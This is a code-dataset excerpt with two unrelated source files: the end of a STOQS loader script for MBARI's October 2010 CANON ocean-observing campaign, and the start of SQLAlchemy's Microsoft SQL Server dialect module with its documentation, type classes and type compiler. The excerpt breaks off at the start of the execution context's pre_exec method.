sys.path.insert(0, parentDir) # So that CANON is found
from CANON import CANONLoader
cl = CANONLoader('stoqs_october2010', 'CANON - October 2010',
description = 'Bloomex observing campaign in Monterey Bay',
x3dTerrains = {
'http://dods.mbari.org/terrain/x3d/Monterey25_10x/Monterey25_10x_scene.x3d': {
'position': '-2822317.31255 -4438600.53640 3786150.85474',
'orientation': '0.89575 -0.31076 -0.31791 1.63772',
'centerOfRotation': '-2711557.9403829873 -4331414.329506527 3801353.4691465236',
'VerticalExaggeration': '10',
'speed': '.1',
}
},
grdTerrain = os.path.join(parentDir, 'Monterey25.grd')
)
# Dorado data - 2 second gridded
cl.dorado_base = 'http://dods.mbari.org/opendap/data/auvctd/surveys/2010/netcdf/'
cl.dorado_files = [ 'Dorado389_2010_277_01_277_01_decim.nc',
'Dorado389_2010_278_01_278_01_decim.nc',
'Dorado389_2010_279_02_279_02_decim.nc',
'Dorado389_2010_280_01_280_01_decim.nc',
'Dorado389_2010_284_00_284_00_decim.nc',
'Dorado389_2010_285_00_285_00_decim.nc',
'Dorado389_2010_286_01_286_02_decim.nc',
'Dorado389_2010_287_00_287_00_decim.nc',
'Dorado389_2010_291_00_291_00_decim.nc',
'Dorado389_2010_292_01_292_01_decim.nc',
'Dorado389_2010_293_00_293_00_decim.nc',
'Dorado389_2010_294_01_294_01_decim.nc',
'Dorado389_2010_298_01_298_01_decim.nc',
'Dorado389_2010_299_00_299_00_decim.nc',
'Dorado389_2010_300_00_300_00_decim.nc',
'Dorado389_2010_301_00_301_00_decim.nc',
]
cl.dorado_parms = [ 'temperature', 'oxygen', 'nitrate', 'bbp420', 'bbp700',
'fl700_uncorr', 'salinity', 'biolume',
'sepCountList', 'mepCountList',
]
# These are full resolution (_d_) data files with Chl only from the first Tethys data used for CANON
# Offical long-term archive location is: http://dods.mbari.org/opendap/data/lrauv/tethys/missionlogs/2010/
cl.tethys_base = 'http://dods.mbari.org/opendap/data/auvctd/tethys/2010/netcdf/'
cl.tethys_files = [ '20101018T143308_Chl_.nc',
'20101019T001815_Chl_.nc',
'20101019T155117_Chl_.nc',
'20101020T113957_Chl_.nc',
]
cl.tethys_parms = ['mass_concentration_of_chlorophyll_in_sea_water']
# Realtime shore.nc files - not a DODS server...
cl.tethys_r_base = 'http://aosn.mbari.org/sbdlogs/tethys/2010/201010/'
cl.tethys_r_files = [ '20101018T143308/shore.nc',
'20101019T001815/shore.nc',
                      '20101019T155117/shore.nc',
'20101020T113957/shore.nc',
]
cl.tethys_r_parms = ['mass_concentration_of_chlorophyll_in_sea_water']
cl.martin_base = 'http://odss.mbari.org/thredds/dodsC/jhm_underway'
cl.martin_files = [ '27710_jhmudas_v1.nc',
'27810_jhmudas_v1.nc',
'27910_jhmudas_v1.nc',
'28010_jhmudas_v1.nc',
'28110_jhmudas_v1.nc',
'28410_jhmudas_v1.nc',
'28510_jhmudas_v1.nc',
'28610_jhmudas_v1.nc',
'28710_jhmudas_v1.nc',
'29010_jhmudas_v1.nc',
'29110_jhmudas_v1.nc',
'29210_jhmudas_v1.nc',
'29310_jhmudas_v1.nc',
'29410_jhmudas_v1.nc',
'29810_jhmudas_v1.nc',
'29910_jhmudas_v1.nc',
'30010_jhmudas_v1.nc',
'30110_jhmudas_v1.nc',
]
cl.martin_parms = [ 'conductivity', 'temperature', 'salinity', 'fluorescence', 'turbidity']
# Execute the load
cl.process_command_line()
if cl.args.test:
cl.loadDorado(stride=100)
cl.loadTethys(stride=1000)
cl.loadMartin(stride=1000)
elif cl.args.optimal_stride:
cl.loadDorado(stride=2)
cl.loadTethys(stride=2)
cl.loadMartin(stride=1)
else:
cl.stride = cl.args.stride
cl.loadDorado()
cl.loadTethys()
cl.loadMartin()
# Add any X3D Terrain information specified in the constructor to the database - must be done after a load is executed
cl.addTerrainResources()
print "All Done."
| gpl-3.0 |
franekp/millandict | ankidict/thirdparty/sqlalchemy/dialects/mssql/base.py | 2 | 71442 | # mssql/base.py
# Copyright (C) 2005-2016 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""
.. dialect:: mssql
:name: Microsoft SQL Server
Auto Increment Behavior
-----------------------
SQL Server provides so-called "auto incrementing" behavior using the
``IDENTITY`` construct, which can be placed on an integer primary key.
SQLAlchemy considers ``IDENTITY`` within its default "autoincrement" behavior,
described at :paramref:`.Column.autoincrement`; this means
that by default, the first integer primary key column in a :class:`.Table`
will be considered to be the identity column and will generate DDL as such::
from sqlalchemy import Table, MetaData, Column, Integer
m = MetaData()
t = Table('t', m,
Column('id', Integer, primary_key=True),
Column('x', Integer))
m.create_all(engine)
The above example will generate DDL as:
.. sourcecode:: sql
CREATE TABLE t (
id INTEGER NOT NULL IDENTITY(1,1),
x INTEGER NULL,
PRIMARY KEY (id)
)
For the case where this default generation of ``IDENTITY`` is not desired,
specify ``autoincrement=False`` on all integer primary key columns::
m = MetaData()
t = Table('t', m,
Column('id', Integer, primary_key=True, autoincrement=False),
Column('x', Integer))
m.create_all(engine)
.. note::
An INSERT statement which refers to an explicit value for such
a column is prohibited by SQL Server, however SQLAlchemy will detect this
and modify the ``IDENTITY_INSERT`` flag accordingly at statement execution
time. As this is not a high performing process, care should be taken to
set the ``autoincrement`` flag appropriately for columns that will not
actually require IDENTITY behavior.
Controlling "Start" and "Increment"
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Specific control over the parameters of the ``IDENTITY`` value is supported
using the :class:`.schema.Sequence` object. While this object normally
represents an explicit "sequence" for supporting backends, on SQL Server it is
re-purposed to specify behavior regarding the identity column, including
support of the "start" and "increment" values::
from sqlalchemy import Table, Integer, Sequence, Column
Table('test', metadata,
Column('id', Integer,
Sequence('blah', start=100, increment=10),
primary_key=True),
Column('name', String(20))
).create(some_engine)
would yield:
.. sourcecode:: sql
CREATE TABLE test (
id INTEGER NOT NULL IDENTITY(100,10) PRIMARY KEY,
name VARCHAR(20) NULL,
)
Note that the ``start`` and ``increment`` values for sequences are
optional and will default to 1,1.
INSERT behavior
^^^^^^^^^^^^^^^^
Handling of the ``IDENTITY`` column at INSERT time involves two key
techniques. The most common is being able to fetch the "last inserted value"
for a given ``IDENTITY`` column, a process which SQLAlchemy performs
implicitly in many cases, most importantly within the ORM.
The process for fetching this value has several variants:
* In the vast majority of cases, RETURNING is used in conjunction with INSERT
statements on SQL Server in order to get newly generated primary key values:
.. sourcecode:: sql
INSERT INTO t (x) OUTPUT inserted.id VALUES (?)
* When RETURNING is not available or has been disabled via
``implicit_returning=False``, either the ``scope_identity()`` function or
the ``@@identity`` variable is used; behavior varies by backend:
* when using PyODBC, the phrase ``; select scope_identity()`` will be
appended to the end of the INSERT statement; a second result set will be
fetched in order to receive the value. Given a table as::
t = Table('t', m, Column('id', Integer, primary_key=True),
Column('x', Integer),
implicit_returning=False)
an INSERT will look like:
.. sourcecode:: sql
INSERT INTO t (x) VALUES (?); select scope_identity()
* Other dialects such as pymssql will call upon
``SELECT scope_identity() AS lastrowid`` subsequent to an INSERT
statement. If the flag ``use_scope_identity=False`` is passed to
:func:`.create_engine`, the statement ``SELECT @@identity AS lastrowid``
is used instead.
A table that contains an ``IDENTITY`` column will prohibit an INSERT statement
that refers to the identity column explicitly. The SQLAlchemy dialect will
detect when an INSERT construct, created using a core :func:`.insert`
construct (not a plain string SQL), refers to the identity column, and
in this case will emit ``SET IDENTITY_INSERT ON`` prior to the insert
statement proceeding, and ``SET IDENTITY_INSERT OFF`` subsequent to the
execution. Given this example::
m = MetaData()
t = Table('t', m, Column('id', Integer, primary_key=True),
Column('x', Integer))
m.create_all(engine)
engine.execute(t.insert(), {'id': 1, 'x':1}, {'id':2, 'x':2})
The above column will be created with IDENTITY, however the INSERT statement
we emit is specifying explicit values. In the echo output we can see
how SQLAlchemy handles this:
.. sourcecode:: sql
CREATE TABLE t (
id INTEGER NOT NULL IDENTITY(1,1),
x INTEGER NULL,
PRIMARY KEY (id)
)
COMMIT
SET IDENTITY_INSERT t ON
INSERT INTO t (id, x) VALUES (?, ?)
((1, 1), (2, 2))
SET IDENTITY_INSERT t OFF
COMMIT
This
is an auxiliary use case suitable for testing and bulk insert scenarios.
MAX on VARCHAR / NVARCHAR
-------------------------
SQL Server supports the special string "MAX" within the
:class:`.sqltypes.VARCHAR` and :class:`.sqltypes.NVARCHAR` datatypes,
to indicate "maximum length possible". The dialect currently handles this as
a length of "None" in the base type, rather than supplying a
dialect-specific version of these types, so that a base type
specified such as ``VARCHAR(None)`` can assume "unlengthed" behavior on
more than one backend without using dialect-specific types.
To build a SQL Server VARCHAR or NVARCHAR with MAX length, use None::
my_table = Table(
'my_table', metadata,
Column('my_data', VARCHAR(None)),
Column('my_n_data', NVARCHAR(None))
)
Collation Support
-----------------
Character collations are supported by the base string types,
specified by the string argument "collation"::
from sqlalchemy import VARCHAR
Column('login', VARCHAR(32, collation='Latin1_General_CI_AS'))
When such a column is associated with a :class:`.Table`, the
CREATE TABLE statement for this column will yield::
login VARCHAR(32) COLLATE Latin1_General_CI_AS NULL
.. versionadded:: 0.8 Character collations are now part of the base string
types.
LIMIT/OFFSET Support
--------------------
MSSQL has no support for the LIMIT or OFFSET keywords. LIMIT is
supported directly through the ``TOP`` Transact SQL keyword::
select.limit
will yield::
SELECT TOP n
If using SQL Server 2005 or above, LIMIT with OFFSET
support is available through the ``ROW_NUMBER OVER`` construct.
For versions below 2005, LIMIT with OFFSET usage will fail.
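As an illustration (the table and column names here are arbitrary), a Core
select using these constructs might look like::

    stmt = my_table.select().order_by(my_table.c.id).limit(10).offset(20)

Without an OFFSET this renders using ``TOP``; with an OFFSET, SQL Server
2005+ rewrites the statement using the ``ROW_NUMBER() OVER`` form, which
requires an ORDER BY to be present.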
.. _mssql_isolation_level:
Transaction Isolation Level
---------------------------
All SQL Server dialects support setting of transaction isolation level
both via a dialect-specific parameter
:paramref:`.create_engine.isolation_level`
accepted by :func:`.create_engine`,
as well as the :paramref:`.Connection.execution_options.isolation_level`
argument as passed to
:meth:`.Connection.execution_options`. This feature works by issuing the
command ``SET TRANSACTION ISOLATION LEVEL <level>`` for
each new connection.
To set isolation level using :func:`.create_engine`::
engine = create_engine(
"mssql+pyodbc://scott:tiger@ms_2008",
isolation_level="REPEATABLE READ"
)
To set using per-connection execution options::
connection = engine.connect()
connection = connection.execution_options(
isolation_level="READ COMMITTED"
)
Valid values for ``isolation_level`` include:
* ``READ COMMITTED``
* ``READ UNCOMMITTED``
* ``REPEATABLE READ``
* ``SERIALIZABLE``
* ``SNAPSHOT`` - specific to SQL Server
.. versionadded:: 1.1 support for isolation level setting on Microsoft
SQL Server.
Nullability
-----------
MSSQL has support for three levels of column nullability. The default
nullability allows nulls and is explicit in the CREATE TABLE
construct::
name VARCHAR(20) NULL
If ``nullable=None`` is specified then no specification is made. In
other words the database's configured default is used. This will
render::
name VARCHAR(20)
If ``nullable`` is ``True`` or ``False`` then the column will be
``NULL`` or ``NOT NULL`` respectively.
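For example (a minimal sketch; the column name is arbitrary)::

    Column('name', String(20), nullable=False)

renders the column as ``name VARCHAR(20) NOT NULL``.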
Date / Time Handling
--------------------
DATE and TIME are supported. Bind parameters are converted
to datetime.datetime() objects as required by most MSSQL drivers,
and results are processed from strings if needed.
The DATE and TIME types are not available for MSSQL 2005 and
previous - if a server version below 2008 is detected, DDL
for these types will be issued as DATETIME.
.. _mssql_large_type_deprecation:
Large Text/Binary Type Deprecation
----------------------------------
Per `SQL Server 2012/2014 Documentation <http://technet.microsoft.com/en-us/library/ms187993.aspx>`_,
the ``NTEXT``, ``TEXT`` and ``IMAGE`` datatypes are to be removed from SQL Server
in a future release. SQLAlchemy normally relates these types to the
:class:`.UnicodeText`, :class:`.Text` and :class:`.LargeBinary` datatypes.
In order to accommodate this change, a new flag ``deprecate_large_types``
is added to the dialect, which will be automatically set based on detection
of the server version in use, if not otherwise set by the user. The
behavior of this flag is as follows:
* When this flag is ``True``, the :class:`.UnicodeText`, :class:`.Text` and
:class:`.LargeBinary` datatypes, when used to render DDL, will render the
types ``NVARCHAR(max)``, ``VARCHAR(max)``, and ``VARBINARY(max)``,
respectively. This is a new behavior as of the addition of this flag.
* When this flag is ``False``, the :class:`.UnicodeText`, :class:`.Text` and
:class:`.LargeBinary` datatypes, when used to render DDL, will render the
types ``NTEXT``, ``TEXT``, and ``IMAGE``,
respectively. This is the long-standing behavior of these types.
* The flag begins with the value ``None``, before a database connection is
established. If the dialect is used to render DDL without the flag being
set, it is interpreted the same as ``False``.
* On first connection, the dialect detects if SQL Server version 2012 or greater
is in use; if the flag is still at ``None``, it sets it to ``True`` or
``False`` based on whether 2012 or greater is detected.
* The flag can be set to either ``True`` or ``False`` when the dialect
is created, typically via :func:`.create_engine`::
eng = create_engine("mssql+pymssql://user:pass@host/db",
deprecate_large_types=True)
* Complete control over whether the "old" or "new" types are rendered is
available in all SQLAlchemy versions by using the UPPERCASE type objects
instead: :class:`.NVARCHAR`, :class:`.VARCHAR`, :class:`.types.VARBINARY`,
:class:`.TEXT`, :class:`.mssql.NTEXT`, :class:`.mssql.IMAGE` will always remain
fixed and always output exactly that type.
.. versionadded:: 1.0.0
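As a short sketch (the table and column names are arbitrary), the older
types can be requested explicitly regardless of the flag::

    from sqlalchemy.dialects.mssql import NTEXT, IMAGE

    Table('docs', metadata,
          Column('body', NTEXT),
          Column('scan', IMAGE))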
.. _legacy_schema_rendering:
Legacy Schema Mode
------------------
Very old versions of the MSSQL dialect introduced the behavior such that a
schema-qualified table would be auto-aliased when used in a
SELECT statement; given a table::
account_table = Table(
'account', metadata,
Column('id', Integer, primary_key=True),
Column('info', String(100)),
schema="customer_schema"
)
this legacy mode of rendering would assume that "customer_schema.account"
would not be accepted by all parts of the SQL statement, as illustrated
below::
>>> eng = create_engine("mssql+pymssql://mydsn", legacy_schema_aliasing=True)
>>> print(account_table.select().compile(eng))
SELECT account_1.id, account_1.info
FROM customer_schema.account AS account_1
This mode of behavior is now off by default, as it appears to have served
no purpose; however in the case that legacy applications rely upon it,
it is available using the ``legacy_schema_aliasing`` argument to
:func:`.create_engine` as illustrated above.
.. versionchanged:: 1.1 the ``legacy_schema_aliasing`` flag introduced
in version 1.0.5 to allow disabling of legacy mode for schemas now
defaults to False.
.. _mssql_indexes:
Clustered Index Support
-----------------------
The MSSQL dialect supports clustered indexes (and primary keys) via the
``mssql_clustered`` option. This option is available to :class:`.Index`,
:class:`.UniqueConstraint`. and :class:`.PrimaryKeyConstraint`.
To generate a clustered index::
Index("my_index", table.c.x, mssql_clustered=True)
which renders the index as ``CREATE CLUSTERED INDEX my_index ON table (x)``.
To generate a clustered primary key use::
Table('my_table', metadata,
Column('x', ...),
Column('y', ...),
PrimaryKeyConstraint("x", "y", mssql_clustered=True))
which will render the table, for example, as::
CREATE TABLE my_table (x INTEGER NOT NULL, y INTEGER NOT NULL,
PRIMARY KEY CLUSTERED (x, y))
Similarly, we can generate a clustered unique constraint using::
Table('my_table', metadata,
Column('x', ...),
Column('y', ...),
PrimaryKeyConstraint("x"),
UniqueConstraint("y", mssql_clustered=True),
)
To explicitly request a non-clustered primary key (for example, when
a separate clustered index is desired), use::
Table('my_table', metadata,
Column('x', ...),
Column('y', ...),
PrimaryKeyConstraint("x", "y", mssql_clustered=False))
which will render the table, for example, as::
CREATE TABLE my_table (x INTEGER NOT NULL, y INTEGER NOT NULL,
PRIMARY KEY NONCLUSTERED (x, y))
.. versionchanged:: 1.1 the ``mssql_clustered`` option now defaults
to None, rather than False. ``mssql_clustered=False`` now explicitly
renders the NONCLUSTERED clause, whereas None omits the CLUSTERED
clause entirely, allowing SQL Server defaults to take effect.
MSSQL-Specific Index Options
-----------------------------
In addition to clustering, the MSSQL dialect supports other special options
for :class:`.Index`.
INCLUDE
^^^^^^^
The ``mssql_include`` option renders INCLUDE(colname) for the given string
names::
Index("my_index", table.c.x, mssql_include=['y'])
would render the index as ``CREATE INDEX my_index ON table (x) INCLUDE (y)``
.. versionadded:: 0.8
Index ordering
^^^^^^^^^^^^^^
Index ordering is available via functional expressions, such as::
Index("my_index", table.c.x.desc())
would render the index as ``CREATE INDEX my_index ON table (x DESC)``
.. versionadded:: 0.8
.. seealso::
:ref:`schema_indexes_functional`
Compatibility Levels
--------------------
MSSQL supports the notion of setting compatibility levels at the
database level. This allows, for instance, to run a database that
is compatible with SQL2000 while running on a SQL2005 database
server. ``server_version_info`` will always return the database
server version information (in this case SQL2005) and not the
compatibility level information. Because of this, if running under
a backwards compatibility mode SQLAlchemy may attempt to use T-SQL
statements that are unable to be parsed by the database server.
Triggers
--------
SQLAlchemy by default uses OUTPUT INSERTED to get at newly
generated primary key values via IDENTITY columns or other
server side defaults. MS-SQL does not
allow the usage of OUTPUT INSERTED on tables that have triggers.
To disable the usage of OUTPUT INSERTED on a per-table basis,
specify ``implicit_returning=False`` for each :class:`.Table`
which has triggers::
Table('mytable', metadata,
Column('id', Integer, primary_key=True),
# ...,
implicit_returning=False
)
Declarative form::
class MyClass(Base):
# ...
__table_args__ = {'implicit_returning':False}
This option can also be specified engine-wide using the
``implicit_returning=False`` argument on :func:`.create_engine`.
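For example (the connection URL shown is illustrative only)::

    engine = create_engine("mssql+pyodbc://scott:tiger@mydsn",
                           implicit_returning=False)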
.. _mssql_rowcount_versioning:
Rowcount Support / ORM Versioning
---------------------------------
The SQL Server drivers have very limited ability to return the number
of rows updated from an UPDATE or DELETE statement. In particular, the
pymssql driver has no support, whereas the pyodbc driver can only return
this value under certain conditions.
In particular, updated rowcount is not available when OUTPUT INSERTED
is used. This impacts the SQLAlchemy ORM's versioning feature when
server-side versioning schemes are used. When
using pyodbc, the "implicit_returning" flag needs to be set to false
for any ORM mapped class that uses a version_id column in conjunction with
a server-side version generator::
class MyTable(Base):
__tablename__ = 'mytable'
id = Column(Integer, primary_key=True)
stuff = Column(String(10))
timestamp = Column(TIMESTAMP(), default=text('DEFAULT'))
__mapper_args__ = {
'version_id_col': timestamp,
'version_id_generator': False,
}
__table_args__ = {
'implicit_returning': False
}
Without the implicit_returning flag above, the UPDATE statement will
use ``OUTPUT inserted.timestamp`` and the rowcount will be returned as
-1, causing the versioning logic to fail.
Enabling Snapshot Isolation
---------------------------
Not necessarily specific to SQLAlchemy, SQL Server has a default transaction
isolation mode that locks entire tables, and causes even mildly concurrent
applications to have long held locks and frequent deadlocks.
Enabling snapshot isolation for the database as a whole is recommended
for modern levels of concurrency support. This is accomplished via the
following ALTER DATABASE commands executed at the SQL prompt::
ALTER DATABASE MyDatabase SET ALLOW_SNAPSHOT_ISOLATION ON
ALTER DATABASE MyDatabase SET READ_COMMITTED_SNAPSHOT ON
Background on SQL Server snapshot isolation is available at
http://msdn.microsoft.com/en-us/library/ms175095.aspx.
Known Issues
------------
* No support for more than one ``IDENTITY`` column per table
* reflection of indexes does not work with versions older than
SQL Server 2005
"""
import datetime
import operator
import re
from ... import sql, schema as sa_schema, exc, util
from ...sql import compiler, expression, util as sql_util
from ... import engine
from ...engine import reflection, default
from ... import types as sqltypes
from ...types import INTEGER, BIGINT, SMALLINT, DECIMAL, NUMERIC, \
FLOAT, TIMESTAMP, DATETIME, DATE, BINARY,\
TEXT, VARCHAR, NVARCHAR, CHAR, NCHAR
from ...util import update_wrapper
from . import information_schema as ischema
# http://sqlserverbuilds.blogspot.com/
MS_2012_VERSION = (11,)
MS_2008_VERSION = (10,)
MS_2005_VERSION = (9,)
MS_2000_VERSION = (8,)
RESERVED_WORDS = set(
['add', 'all', 'alter', 'and', 'any', 'as', 'asc', 'authorization',
'backup', 'begin', 'between', 'break', 'browse', 'bulk', 'by', 'cascade',
'case', 'check', 'checkpoint', 'close', 'clustered', 'coalesce',
'collate', 'column', 'commit', 'compute', 'constraint', 'contains',
'containstable', 'continue', 'convert', 'create', 'cross', 'current',
'current_date', 'current_time', 'current_timestamp', 'current_user',
'cursor', 'database', 'dbcc', 'deallocate', 'declare', 'default',
'delete', 'deny', 'desc', 'disk', 'distinct', 'distributed', 'double',
'drop', 'dump', 'else', 'end', 'errlvl', 'escape', 'except', 'exec',
'execute', 'exists', 'exit', 'external', 'fetch', 'file', 'fillfactor',
'for', 'foreign', 'freetext', 'freetexttable', 'from', 'full',
'function', 'goto', 'grant', 'group', 'having', 'holdlock', 'identity',
'identity_insert', 'identitycol', 'if', 'in', 'index', 'inner', 'insert',
'intersect', 'into', 'is', 'join', 'key', 'kill', 'left', 'like',
'lineno', 'load', 'merge', 'national', 'nocheck', 'nonclustered', 'not',
'null', 'nullif', 'of', 'off', 'offsets', 'on', 'open', 'opendatasource',
'openquery', 'openrowset', 'openxml', 'option', 'or', 'order', 'outer',
'over', 'percent', 'pivot', 'plan', 'precision', 'primary', 'print',
'proc', 'procedure', 'public', 'raiserror', 'read', 'readtext',
'reconfigure', 'references', 'replication', 'restore', 'restrict',
'return', 'revert', 'revoke', 'right', 'rollback', 'rowcount',
'rowguidcol', 'rule', 'save', 'schema', 'securityaudit', 'select',
'session_user', 'set', 'setuser', 'shutdown', 'some', 'statistics',
'system_user', 'table', 'tablesample', 'textsize', 'then', 'to', 'top',
'tran', 'transaction', 'trigger', 'truncate', 'tsequal', 'union',
'unique', 'unpivot', 'update', 'updatetext', 'use', 'user', 'values',
'varying', 'view', 'waitfor', 'when', 'where', 'while', 'with',
'writetext',
])
class REAL(sqltypes.REAL):
__visit_name__ = 'REAL'
def __init__(self, **kw):
# REAL is a synonym for FLOAT(24) on SQL server
kw['precision'] = 24
super(REAL, self).__init__(**kw)
class TINYINT(sqltypes.Integer):
__visit_name__ = 'TINYINT'
# MSSQL DATE/TIME types have varied behavior, sometimes returning
# strings. MSDate/TIME check for everything, and always
# filter bind parameters into datetime objects (required by pyodbc,
# not sure about other dialects).
class _MSDate(sqltypes.Date):
def bind_processor(self, dialect):
def process(value):
if type(value) == datetime.date:
return datetime.datetime(value.year, value.month, value.day)
else:
return value
return process
_reg = re.compile(r"(\d+)-(\d+)-(\d+)")
def result_processor(self, dialect, coltype):
def process(value):
if isinstance(value, datetime.datetime):
return value.date()
elif isinstance(value, util.string_types):
m = self._reg.match(value)
if not m:
raise ValueError(
"could not parse %r as a date value" % (value, ))
return datetime.date(*[
int(x or 0)
for x in m.groups()
])
else:
return value
return process
class TIME(sqltypes.TIME):
def __init__(self, precision=None, **kwargs):
self.precision = precision
super(TIME, self).__init__()
__zero_date = datetime.date(1900, 1, 1)
def bind_processor(self, dialect):
def process(value):
if isinstance(value, datetime.datetime):
value = datetime.datetime.combine(
self.__zero_date, value.time())
elif isinstance(value, datetime.time):
value = datetime.datetime.combine(self.__zero_date, value)
return value
return process
_reg = re.compile(r"(\d+):(\d+):(\d+)(?:\.(\d{0,6}))?")
def result_processor(self, dialect, coltype):
def process(value):
if isinstance(value, datetime.datetime):
return value.time()
elif isinstance(value, util.string_types):
m = self._reg.match(value)
if not m:
raise ValueError(
"could not parse %r as a time value" % (value, ))
return datetime.time(*[
int(x or 0)
for x in m.groups()])
else:
return value
return process
_MSTime = TIME
class _DateTimeBase(object):
def bind_processor(self, dialect):
def process(value):
if type(value) == datetime.date:
return datetime.datetime(value.year, value.month, value.day)
else:
return value
return process
class _MSDateTime(_DateTimeBase, sqltypes.DateTime):
pass
class SMALLDATETIME(_DateTimeBase, sqltypes.DateTime):
__visit_name__ = 'SMALLDATETIME'
class DATETIME2(_DateTimeBase, sqltypes.DateTime):
__visit_name__ = 'DATETIME2'
def __init__(self, precision=None, **kw):
super(DATETIME2, self).__init__(**kw)
self.precision = precision
# TODO: is this not an Interval ?
class DATETIMEOFFSET(sqltypes.TypeEngine):
__visit_name__ = 'DATETIMEOFFSET'
def __init__(self, precision=None, **kwargs):
self.precision = precision
class _StringType(object):
"""Base for MSSQL string types."""
def __init__(self, collation=None):
super(_StringType, self).__init__(collation=collation)
class NTEXT(sqltypes.UnicodeText):
"""MSSQL NTEXT type, for variable-length unicode text up to 2^30
characters."""
__visit_name__ = 'NTEXT'
class VARBINARY(sqltypes.VARBINARY, sqltypes.LargeBinary):
"""The MSSQL VARBINARY type.
This type extends both :class:`.types.VARBINARY` and
:class:`.types.LargeBinary`. In "deprecate_large_types" mode,
the :class:`.types.LargeBinary` type will produce ``VARBINARY(max)``
on SQL Server.
.. versionadded:: 1.0.0
.. seealso::
:ref:`mssql_large_type_deprecation`
"""
__visit_name__ = 'VARBINARY'
class IMAGE(sqltypes.LargeBinary):
__visit_name__ = 'IMAGE'
class BIT(sqltypes.TypeEngine):
__visit_name__ = 'BIT'
class MONEY(sqltypes.TypeEngine):
__visit_name__ = 'MONEY'
class SMALLMONEY(sqltypes.TypeEngine):
__visit_name__ = 'SMALLMONEY'
class UNIQUEIDENTIFIER(sqltypes.TypeEngine):
__visit_name__ = "UNIQUEIDENTIFIER"
class SQL_VARIANT(sqltypes.TypeEngine):
__visit_name__ = 'SQL_VARIANT'
# old names.
MSDateTime = _MSDateTime
MSDate = _MSDate
MSReal = REAL
MSTinyInteger = TINYINT
MSTime = TIME
MSSmallDateTime = SMALLDATETIME
MSDateTime2 = DATETIME2
MSDateTimeOffset = DATETIMEOFFSET
MSText = TEXT
MSNText = NTEXT
MSString = VARCHAR
MSNVarchar = NVARCHAR
MSChar = CHAR
MSNChar = NCHAR
MSBinary = BINARY
MSVarBinary = VARBINARY
MSImage = IMAGE
MSBit = BIT
MSMoney = MONEY
MSSmallMoney = SMALLMONEY
MSUniqueIdentifier = UNIQUEIDENTIFIER
MSVariant = SQL_VARIANT
ischema_names = {
'int': INTEGER,
'bigint': BIGINT,
'smallint': SMALLINT,
'tinyint': TINYINT,
'varchar': VARCHAR,
'nvarchar': NVARCHAR,
'char': CHAR,
'nchar': NCHAR,
'text': TEXT,
'ntext': NTEXT,
'decimal': DECIMAL,
'numeric': NUMERIC,
'float': FLOAT,
'datetime': DATETIME,
'datetime2': DATETIME2,
'datetimeoffset': DATETIMEOFFSET,
'date': DATE,
'time': TIME,
'smalldatetime': SMALLDATETIME,
'binary': BINARY,
'varbinary': VARBINARY,
'bit': BIT,
'real': REAL,
'image': IMAGE,
'timestamp': TIMESTAMP,
'money': MONEY,
'smallmoney': SMALLMONEY,
'uniqueidentifier': UNIQUEIDENTIFIER,
'sql_variant': SQL_VARIANT,
}
class MSTypeCompiler(compiler.GenericTypeCompiler):
def _extend(self, spec, type_, length=None):
"""Extend a string-type declaration with standard SQL
COLLATE annotations.
"""
if getattr(type_, 'collation', None):
collation = 'COLLATE %s' % type_.collation
else:
collation = None
if not length:
length = type_.length
if length:
spec = spec + "(%s)" % length
return ' '.join([c for c in (spec, collation)
if c is not None])
def visit_FLOAT(self, type_, **kw):
precision = getattr(type_, 'precision', None)
if precision is None:
return "FLOAT"
else:
return "FLOAT(%(precision)s)" % {'precision': precision}
def visit_TINYINT(self, type_, **kw):
return "TINYINT"
def visit_DATETIMEOFFSET(self, type_, **kw):
if type_.precision is not None:
return "DATETIMEOFFSET(%s)" % type_.precision
else:
return "DATETIMEOFFSET"
def visit_TIME(self, type_, **kw):
precision = getattr(type_, 'precision', None)
if precision is not None:
return "TIME(%s)" % precision
else:
return "TIME"
def visit_DATETIME2(self, type_, **kw):
precision = getattr(type_, 'precision', None)
if precision is not None:
return "DATETIME2(%s)" % precision
else:
return "DATETIME2"
def visit_SMALLDATETIME(self, type_, **kw):
return "SMALLDATETIME"
def visit_unicode(self, type_, **kw):
return self.visit_NVARCHAR(type_, **kw)
def visit_text(self, type_, **kw):
if self.dialect.deprecate_large_types:
return self.visit_VARCHAR(type_, **kw)
else:
return self.visit_TEXT(type_, **kw)
def visit_unicode_text(self, type_, **kw):
if self.dialect.deprecate_large_types:
return self.visit_NVARCHAR(type_, **kw)
else:
return self.visit_NTEXT(type_, **kw)
def visit_NTEXT(self, type_, **kw):
return self._extend("NTEXT", type_)
def visit_TEXT(self, type_, **kw):
return self._extend("TEXT", type_)
def visit_VARCHAR(self, type_, **kw):
return self._extend("VARCHAR", type_, length=type_.length or 'max')
def visit_CHAR(self, type_, **kw):
return self._extend("CHAR", type_)
def visit_NCHAR(self, type_, **kw):
return self._extend("NCHAR", type_)
def visit_NVARCHAR(self, type_, **kw):
return self._extend("NVARCHAR", type_, length=type_.length or 'max')
def visit_date(self, type_, **kw):
if self.dialect.server_version_info < MS_2008_VERSION:
return self.visit_DATETIME(type_, **kw)
else:
return self.visit_DATE(type_, **kw)
def visit_time(self, type_, **kw):
if self.dialect.server_version_info < MS_2008_VERSION:
return self.visit_DATETIME(type_, **kw)
else:
return self.visit_TIME(type_, **kw)
def visit_large_binary(self, type_, **kw):
if self.dialect.deprecate_large_types:
return self.visit_VARBINARY(type_, **kw)
else:
return self.visit_IMAGE(type_, **kw)
def visit_IMAGE(self, type_, **kw):
return "IMAGE"
def visit_VARBINARY(self, type_, **kw):
return self._extend(
"VARBINARY",
type_,
length=type_.length or 'max')
def visit_boolean(self, type_, **kw):
return self.visit_BIT(type_)
def visit_BIT(self, type_, **kw):
return "BIT"
def visit_MONEY(self, type_, **kw):
return "MONEY"
def visit_SMALLMONEY(self, type_, **kw):
return 'SMALLMONEY'
def visit_UNIQUEIDENTIFIER(self, type_, **kw):
return "UNIQUEIDENTIFIER"
def visit_SQL_VARIANT(self, type_, **kw):
return 'SQL_VARIANT'
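# Execution context: turns SET IDENTITY_INSERT ON/OFF around INSERTs that
# supply explicit values for an IDENTITY column, and fetches the last row id
# via scope_identity()/@@identity when RETURNING is not in use.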
class MSExecutionContext(default.DefaultExecutionContext):
_enable_identity_insert = False
_select_lastrowid = False
_result_proxy = None
_lastrowid = None
def _opt_encode(self, statement):
if not self.dialect.supports_unicode_statements:
return self.dialect._encoder(statement)[0]
else:
return statement
def pre_exec(self):
